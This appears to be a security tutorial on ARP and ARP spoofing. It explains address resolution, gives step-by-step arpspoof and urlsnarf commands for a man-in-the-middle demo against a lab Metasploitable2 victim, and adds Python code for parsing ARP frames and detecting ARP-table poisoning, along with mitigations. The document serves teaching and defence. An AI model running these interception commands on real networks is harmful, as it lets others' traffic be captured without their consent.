Whenever you walk into a coffee shop or another public place offering free Wi-Fi, someone on the same network can capture your unencrypted web traffic through ARP spoofing, an attack technique that exploits weaknesses in the Address Resolution Protocol (ARP).
How does the Internet transmit data?
The Internet moves data in packets, addressed with MAC addresses and IP addresses:
- Packets: a packet is like an envelope containing the data to be sent over the Internet. Its header carries the source and destination of the data.
- MAC address: every device has a Network Interface Card (NIC) that connects it to the local network (here, the Wi-Fi router). The card has a unique Media Access Control (MAC) address that identifies the device on the local network.
- IP address: a logical address used to locate devices on local or global networks; routers use it to forward packets between networks.
The key differences between a MAC address and an IP address are as follows:
| Feature | MAC address | IP address |
|---|---|---|
| Full name | Media Access Control address | Internet Protocol address |
| Purpose | Unique identifier for network hardware (physical address) | Logical address used for locating devices on networks |
| Layer | Layer 2 (Data link layer) | Layer 3 (Network layer) |
| Format | 00:1A:2B:3C:4D:5E (Hexadecimal, 48-bit) | IPv4: 192.168.1.10, IPv6: 2001:0db8::1 (Logical, binary) |
| Assigned by | Manufacturer (hardcoded into NIC) | Network or ISP (dynamically or statically assigned) |
| Scope | Local network only | Global or local network |
| Persistence | Fixed (but spoofable) | Can change frequently (DHCP, mobility) |
| Used by | Switches and NICs to forward frames within a LAN | Routers to forward packets between networks |
| Visibility | Visible only within local subnet | Visible across the internet (for public IPs) |
Simply put, the MAC address identifies WHO you are, while the IP address identifies WHERE you are on the network.
What is ARP?
ARP stands for Address Resolution Protocol. It’s a Layer 2 protocol used to map an IP address (Layer 3) to a MAC address (Layer 2) within a local area network (LAN).
How does the router learn the MAC address of the machine at a specific IP address? When a device wants to communicate with another on the same LAN, it must know the recipient’s MAC address. If that mapping is not cached yet, it broadcasts an ARP request like the one below:
# ARP request (broadcast)
Who has 192.168.1.1? Tell 192.168.1.100
The device with that IP responds with its MAC, and your machine stores the mapping in its ARP table (the ARP cache).
# ARP reply (unicast)
192.168.1.1 is at aa:bb:cc:dd:ee:ff
The ARP table therefore links where you are (IP address) to who you are (MAC address) on the local network. ARP carries no authentication: a host has no way to verify that a reply really came from the owner of the IP address in question.
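To make the two messages above concrete, here is an added example (not part of the original post) that decodes raw ARP frames into the same "Who has ... ? Tell ..." and "... is at ..." wording. The byte strings are constructed to match the exchange above, with 11:22:33:44:55:66 as an assumed MAC address for 192.168.1.100; they are not captured traffic.

```python
import struct
from dataclasses import dataclass

ETHERTYPE_ARP = 0x0806
ARP_REQUEST = 1
ARP_REPLY = 2


@dataclass
class ArpFrame:
    eth_dst: str   # Ethernet destination (ff:ff:ff:ff:ff:ff for a broadcast request)
    eth_src: str   # Ethernet source
    oper: int      # 1 = request, 2 = reply
    sha: str       # sender hardware (MAC) address
    spa: str       # sender protocol (IPv4) address
    tha: str       # target hardware address (all zeros in a request)
    tpa: str       # target protocol address

    def describe(self) -> str:
        """Render the frame the way tcpdump and the text above do."""
        if self.oper == ARP_REQUEST:
            return f"Who has {self.tpa}? Tell {self.spa}"
        if self.oper == ARP_REPLY:
            return f"{self.spa} is at {self.sha}"
        return f"ARP opcode {self.oper} (unhandled)"

    def sender_consistent(self) -> bool:
        """True when the ARP sender MAC matches the Ethernet source MAC.
        A mismatch is not proof of spoofing, but it is a cheap signal worth logging."""
        return self.eth_src == self.sha


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def parse_arp_frame(frame: bytes) -> ArpFrame:
    """Decode an Ethernet II frame carrying an Ethernet/IPv4 ARP packet."""
    if len(frame) < 42:  # 14-byte Ethernet header + 28-byte ARP packet
        raise ValueError("frame too short for Ethernet + ARP")
    eth_dst, eth_src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_ARP:
        raise ValueError(f"not an ARP frame (ethertype 0x{ethertype:04x})")
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = struct.unpack(
        "!HHBBH6s4s6s4s", frame[14:42]
    )
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("only Ethernet (htype 1) / IPv4 (ptype 0x0800) ARP is handled")
    return ArpFrame(
        mac_str(eth_dst), mac_str(eth_src), oper,
        mac_str(sha), ip_str(spa), mac_str(tha), ip_str(tpa),
    )


# Constructed sample frames (not captured traffic) matching the exchange above:
# 192.168.1.100 (assumed MAC 11:22:33:44:55:66) asks for 192.168.1.1, and the
# router (aa:bb:cc:dd:ee:ff) answers.
SAMPLE_REQUEST = bytes.fromhex(
    "ffffffffffff" "112233445566" "0806"   # Ethernet: broadcast dst, src, ethertype ARP
    "0001" "0800" "06" "04" "0001"         # htype, ptype, hlen, plen, opcode request
    "112233445566" "c0a80164"              # sender MAC, sender IP 192.168.1.100
    "000000000000" "c0a80101"              # target MAC unknown, target IP 192.168.1.1
)
SAMPLE_REPLY = bytes.fromhex(
    "112233445566" "aabbccddeeff" "0806"   # Ethernet: unicast back to the asker
    "0001" "0800" "06" "04" "0002"         # opcode reply
    "aabbccddeeff" "c0a80101"              # sender MAC, sender IP 192.168.1.1
    "112233445566" "c0a80164"              # target MAC, target IP 192.168.1.100
)

if __name__ == "__main__":
    for raw in (SAMPLE_REQUEST, SAMPLE_REPLY):
        f = parse_arp_frame(raw)
        print(f.describe(), "| eth src matches ARP sender:", f.sender_consistent())
```

The 28-byte ARP body has no field for a signature or any other proof of ownership; the only data a receiver can check is whether the Ethernet source and the ARP sender field agree, which is why `sender_consistent` exists.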
What are ARP spoofing attacks?
ARP spoofing (or ARP poisoning) is a man-in-the-middle (MITM) technique that exploits this lack of authentication: the attacker sends forged ARP replies so that the victim’s ARP table maps the router’s IP address to the attacker’s MAC address, and the router’s table maps the victim’s IP address to the attacker’s MAC address. Traffic between the two then flows through the attacker’s machine.
Performing an ARP Spoofing attack
In the demo below, we show you how to perform an ARP spoofing attack from start to finish.
Below are the commands used in the demo to perform the attack from a Kali machine:
Install the dsniff suite as root on your machine (here, Kali). It bundles several tools for intercepting network traffic, including arpspoof, which performs the ARP spoofing itself.
sudo -i
apt-get update
apt-get install dsniff
Discover the other machines on the network. In our demo, the victim is a Metasploitable2 machine behind a pfSense router. The router on your network typically has the lowest IP address in the range.
sudo netdiscover
Next, enable IP forwarding on your machine so that the packets you intercept are passed on to their real destination rather than dropped (otherwise the victim simply loses connectivity).
echo 1 > /proc/sys/net/ipv4/ip_forward
You can now send a stream of forged ARP replies telling the victim that the router’s IP address maps to your MAC address. The addresses are placeholders; substitute the ones found with netdiscover.
arpspoof -i eth0 -t <victim-ip> <router-ip>
You’ll now trick the router into believing that you are the victim’s machine so you can intercept their traffic. Note that the IP addresses are now swapped.
arpspoof -i eth0 -t <router-ip> <victim-ip>
Now, launch a listener to intercept your victim’s traffic.
urlsnarf -i eth0
You can now switch to the victim’s machine and generate some traffic.
wget http://www.google.com
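From the defender’s side, the attack above leaves a visible trace in every ARP table on the segment: the gateway’s entry changes, and one MAC address (the attacker’s) suddenly answers for two IP addresses. The following added example, not part of the original post or of the dsniff suite, compares two snapshots of `ip -4 neigh show` output and raises those signals. The snapshots, MAC addresses and the pinned gateway MAC are constructed for illustration.

```python
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Constructed samples (not real captures) of `ip -4 neigh show` output on a host
# in the 192.168.1.0/24 network: a known-good snapshot, and one taken while the
# gateway entry is poisoned. Only lines with an "lladdr" field carry a mapping.
SNAPSHOT_CLEAN = """\
192.168.1.1 dev eth0 lladdr aa:bb:cc:dd:ee:ff REACHABLE
192.168.1.100 dev eth0 lladdr 11:22:33:44:55:66 STALE
192.168.1.50 dev eth0 lladdr 66:55:44:33:22:11 REACHABLE
192.168.1.77 dev eth0 FAILED
"""
SNAPSHOT_POISONED = """\
192.168.1.1 dev eth0 lladdr 66:55:44:33:22:11 REACHABLE
192.168.1.100 dev eth0 lladdr 11:22:33:44:55:66 STALE
192.168.1.50 dev eth0 lladdr 66:55:44:33:22:11 REACHABLE
192.168.1.77 dev eth0 FAILED
"""

# Gateway MAC recorded when the network was known-good (hypothetical value).
PINNED = {"192.168.1.1": "aa:bb:cc:dd:ee:ff"}


def parse_neigh(text: str) -> Dict[str, str]:
    """Turn `ip neigh` output into an {ip: mac} map, skipping incomplete entries."""
    table: Dict[str, str] = {}
    for line in text.splitlines():
        fields = line.split()
        if "lladdr" not in fields:
            continue  # FAILED / INCOMPLETE entries have no MAC yet
        ip = fields[0]
        mac = fields[fields.index("lladdr") + 1].lower()
        table[ip] = mac
    return table


def find_shared_macs(table: Dict[str, str]) -> Dict[str, List[str]]:
    """MACs that answer for more than one IP. During ARP spoofing the attacker's
    NIC shows up both under its own IP and under the gateway's or victim's IP."""
    by_mac: Dict[str, List[str]] = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def detect_poisoning(before: Dict[str, str], after: Dict[str, str],
                     pinned: Optional[Dict[str, str]] = None) -> List[Tuple]:
    """Compare two ARP table snapshots and return alert tuples:
    ("mac_changed", ip, old_mac, new_mac), ("shared_mac", mac, (ips...)),
    ("pinned_mismatch", ip, expected_mac, seen_mac)."""
    alerts: List[Tuple] = []
    for ip, mac in after.items():
        old = before.get(ip)
        if old is not None and old != mac:
            alerts.append(("mac_changed", ip, old, mac))
    for mac, ips in find_shared_macs(after).items():
        alerts.append(("shared_mac", mac, tuple(ips)))
    for ip, expected in (pinned or {}).items():
        seen = after.get(ip)
        if seen is not None and seen != expected:
            alerts.append(("pinned_mismatch", ip, expected, seen))
    return alerts


if __name__ == "__main__":
    before = parse_neigh(SNAPSHOT_CLEAN)
    after = parse_neigh(SNAPSHOT_POISONED)
    for alert in detect_poisoning(before, after, PINNED):
        print(alert)
```

Treat a shared MAC as a signal rather than a verdict: a router that holds several addresses on one interface, or a VRRP/HSRP pair, legitimately answers for more than one IP. A pinned mismatch for the gateway is much stronger evidence. On the mitigation side, a static entry (`ip neigh replace <gateway-ip> lladdr <gateway-mac> dev eth0 nud permanent`) stops a single host from accepting forged replies for the gateway, managed switches can enforce the same thing for everyone with Dynamic ARP Inspection, and using TLS end to end means that what urlsnarf sees on an intercepted connection is not the content of the request.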